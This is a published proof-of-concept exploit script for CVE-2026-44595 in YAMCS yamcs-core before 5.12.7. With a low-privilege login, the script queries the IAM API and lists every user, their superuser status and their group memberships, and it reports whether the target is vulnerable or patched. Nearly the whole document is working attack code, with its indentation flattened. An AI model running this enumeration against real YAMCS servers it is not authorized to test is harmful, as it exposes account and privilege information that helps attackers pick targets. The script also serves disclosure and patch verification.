# Exploit Title: YAMCS yamcs-core < 5.12.7 - User Enumeration
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44595
# Category: Remote / Information Disclosure
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29
#!/usr/bin/env python3
"""
CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
=================================================================
IAM API endpoints (listUsers, getUser, listGroups, getGroup) do
not enforce SystemPrivilege.ControlAccess. Any authenticated user
can enumerate all accounts, superuser status, and group memberships.
Affected endpoints:
GET /api/iam/users
GET /api/iam/users/{name}
GET /api/iam/groups
GET /api/iam/groups/{name}
=================================================================
"""
import requests
import sys
import json
def main():
target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
password = sys.argv[3] if len(sys.argv) > 3 else "test"
base = target.rstrip("/")
print("=" * 65)
print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
print(f" Target: {target}")
print(f" Username: {username} (low-privilege account)")
print("=" * 65)
# Authenticate
print(f"\n[1] Authenticating as low-privilege user...")
try:
resp = requests.post(f"{base}/auth/token",
data={"grant_type": "password",
"username": username,
"password": password})
if resp.status_code != 200:
print(f" [-] Auth failed: HTTP {resp.status_code}")
print(f" [*] Create test user: yamcsadmin users create testuser --password test")
return
token = resp.json().get("access_token")
print(f" [+] Token: {token[:30]}...")
headers = {"Authorization": f"Bearer {token}"}
except Exception as e:
print(f" [-] Error: {e}")
return
# Enumerate users
print(f"\n[2] GET /api/iam/users (requires ControlAccess — not enforced):")
resp = requests.get(f"{base}/api/iam/users", headers=headers)
print(f" HTTP: {resp.status_code}")
if resp.status_code == 200:
users = resp.json().get("users", [])
print(f"\n [!!!] VULNERABLE — {len(users)} users enumerated:")
for u in users:
flag = "SUPERUSER" if u.get("superuser") else "regular"
print(f" -> {u.get('name')} [{flag}]")
elif resp.status_code == 403:
print(f" [+] 403 Access Denied — PATCHED")
# Enumerate groups
print(f"\n[3] GET /api/iam/groups:")
resp = requests.get(f"{base}/api/iam/groups", headers=headers)
print(f" HTTP: {resp.status_code}")
if resp.status_code == 200:
groups = resp.json().get("groups", [])
print(f"\n [!!!] VULNERABLE — {len(groups)} groups enumerated:")
for g in groups:
print(f" -> {g.get('name')} ({len(g.get('members', []))} members)")
elif resp.status_code == 403:
print(f" [+] 403 Access Denied — PATCHED")
print("\n" + "=" * 65)
print(" Fix: Upgrade to yamcs-core >= 5.12.7")
print("=" * 65)
if __name__ == "__main__":
main()
